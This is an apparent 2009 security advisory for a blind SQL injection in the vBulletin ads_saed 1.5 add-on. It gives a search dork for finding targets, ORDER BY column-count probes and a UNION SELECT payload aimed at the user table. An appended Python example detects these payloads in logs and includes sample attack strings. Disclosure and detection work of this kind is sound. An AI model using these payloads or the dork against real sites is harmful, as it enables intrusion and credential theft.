
# Title : vBulletin ads_saed 1.5 (bnnr.php) SQL Injection Vulnerability
# Published : 2009-12-30
# Author : Hussin X


vBulletin ads_saed 1.5 (bnnr.php) SQL Injection Vulnerability
___________________________________

Author: Hussin X

Home :  www.IQ-TY.com

Mail : darkangel_G85@yahoo.com
___________________________________

## script name : ads_saed

## d0rk : inurl:"vb/bnnr.php"

## Example :


Go to url : http://server/vb/bnnr.php

The "user name" input is vulnerable to blind SQL injection:

user name = ' ORDER BY 15/*

user name = ' ORDER BY 16/*

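Now view the page source : "Unknown column '16' in 'order clause'"

ORDER BY 15 is accepted and ORDER BY 16 fails, which indicates that the query returns 15 columns.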


exploit :

user name =
' UNION SELECT 1,2,3,4,5,4,7,8,9,10,11,12,13,14,15 FROM user where+userid=1/*



# Solution : See here

http://www.traidnt.net/vb/showthread.php?t=1102593

or update to the new version of the product
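
For sites that ran an unpatched copy, the following added example (not part of the original advisory) reviews logged "user name" submissions for the two payload shapes shown above: ORDER BY column-count probes and a numeric UNION SELECT. The record format (client address, submitted value) and all sample records are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Patterns for the two payload shapes shown in the advisory.
ORDER_PROBE = re.compile(r"'\s*order\s+by\s+(\d+)\s*(?:/\*|--|#)", re.I)
UNION_ENUM = re.compile(
    r"'\s*union\s+(?:all\s+)?select\s+((?:\d+\s*,\s*)+\d+)\s+from\s+(\w+)", re.I)

def normalize(value):
    """URL-decode and collapse whitespace so encoded variants match."""
    return re.sub(r"\s+", " ", unquote_plus(value)).strip()

def classify(value):
    """Return ('order_probe', n), ('union_enum', columns, table) or None."""
    v = normalize(value)
    m = ORDER_PROBE.search(v)
    if m:
        return ("order_probe", int(m.group(1)))
    m = UNION_ENUM.search(v)
    if m:
        return ("union_enum", len(m.group(1).split(",")), m.group(2).lower())
    return None

def review(records):
    """Group findings per client; probing followed by a UNION is 'high'."""
    clients = {}
    for client, value in records:
        hit = classify(value)
        if hit:
            clients.setdefault(client, []).append(hit)
    report = {}
    for client, hits in clients.items():
        probes = [h[1] for h in hits if h[0] == "order_probe"]
        unions = [h[1] for h in hits if h[0] == "union_enum"]
        severity = "high" if probes and unions else "medium"
        report[client] = {"severity": severity, "probes": probes,
                          "union_columns": unions}
    return report

# Constructed sample records: (client address, submitted "user name" value).
SAMPLE = [
    ("203.0.113.7", "alice"),
    ("203.0.113.7", "%27+ORDER+BY+15%2F*"),
    ("203.0.113.7", "' ORDER BY 16/*"),
    ("203.0.113.7", "' UNION SELECT 1,2,3,4,5,4,7,8,9,10,11,12,13,14,15 FROM user where+userid=1/*"),
    ("198.51.100.4", "O'Brien"),
    ("198.51.100.9", "' order  by 3 -- "),
]
```

Calling review(SAMPLE) returns one entry per client that submitted a matching value; a client that probed the column count and then sent a UNION SELECT is rated "high".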



End

IQ-SecuritY FoRuM